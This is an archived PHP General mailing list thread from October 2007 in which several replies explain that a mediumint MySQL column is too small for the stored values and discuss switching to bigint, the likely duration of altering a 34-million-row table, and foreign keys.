That's clearly a problem for a lot of my values.

I can switch them both to bigint. One table has 34,000,000 records
and it's OK if this is hung up for a few minutes but not much longer
than that - any chance this change might take longer than 5 or 10
minutes?

On Oct 5, 2007, at 5:43 AM, Richard Davey wrote:

> Hi Brian,
>
> Friday, October 5, 2007, 1:28:35 PM, you wrote:
>
>> This is indeed the complete code, I did not cut anything out for
>> brevity, which is why this appears to be so impossible.
>
>> eAccelerator is activated, could something be corrupt? Could a
>> corrupt index cause this?
>
>> In table1, `referer` is int(12).
>> In table2, `data` is text
>> In table2, `friend_id` is mediumint(9) - which I see is a problem in
>> some cases, $referer can (rarely) be 10 digits long, so I just
>> changed it to int(12)
>
> The number in () after the int doesn't apply to the number of digits
> it can contain. A mediumint field will never hold a value above
> 16,777,215 assuming you are using an unsigned field, otherwise the
> limit is a mere 8,388,607 - neither of which are big enough to hold
> the
> value you're trying to put into it (69,833,818)
>
> An unsigned int field MAY be enough, the limit being 4,294,967,295 -
> but if you've got a 10 digit value LARGER than this, it'll still fail.
> Meaning you either need to use a bigint field, or rethink how you are
> storing these values in the first place.
>
> Cheers,
>
> Rich
> --
> Zend Certified Engineer
> http://www.corephp.co.uk
>
> "Never trust a computer you can't throw out of a window"
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>

attached mail follows:


Brian Dunning wrote:
> I definitely misunderstood what you guys are saying about the length.
> That's clearly a problem for a lot of my values.
>
> I can switch them both to bigint. One table has 34,000,000 records and
> it's OK if this is hung up for a few minutes but not much longer than
> that - any chance this change might take longer than 5 or 10 minutes?

It can take a while depending on the power of your server, the load it's
under and the number of indexes you have on the table etc.

I've had updates on large tables take like 20-30 minutes before :(

One thing you can do to help reduce the posibility of having mismatched
fields like this in the future is to use a DB Storage backend that
supports Foreign keys e.g. InnoDB or the next version of MyISAM (I
think) for MySQL... Foreign keys basically tell the DB engine "this
field in this table can only except values that are entered into this
other field in this other table". The DB will refuse to let you add a
foreign key if the fields are different types.

There are many other advantages to foreign keys too, like ensuring data
integrity at the DB level (making the application logic simpler in many
cases) and vastly simplifying delete operations through the use of
cascading deletes.

Anyways, food for thought perhaps.

Col

attached mail follows:


Hi Brian,

Friday, October 5, 2007, 2:10:32 PM, you wrote:

> I definitely misunderstood what you guys are saying about the length.
> That's clearly a problem for a lot of my values.

> I can switch them both to bigint. One table has 34,000,000 records
> and it's OK if this is hung up for a few minutes but not much longer
> than that - any chance this change might take longer than 5 or 10
> minutes?

Impossible to quantify to be honest - it will depend a lot on what the
server is doing at the time, how much RAM/CPU it has, etc. I'd
recommend duplicating the table to a different server entirely (a
local test box perhaps) and then running the change and timing it.

It's the only way you'll really know - at the very least I'd strongly
recommend you take the MySQL server totally offline when you make the
change. Not only will it do it faster, it will avoid anyone on the
site browsing into a world of pain.

Cheers,

Rich
--
Zend Certified Engineer
http://www.corephp.co.uk

"Never trust a computer you can't throw out of a window"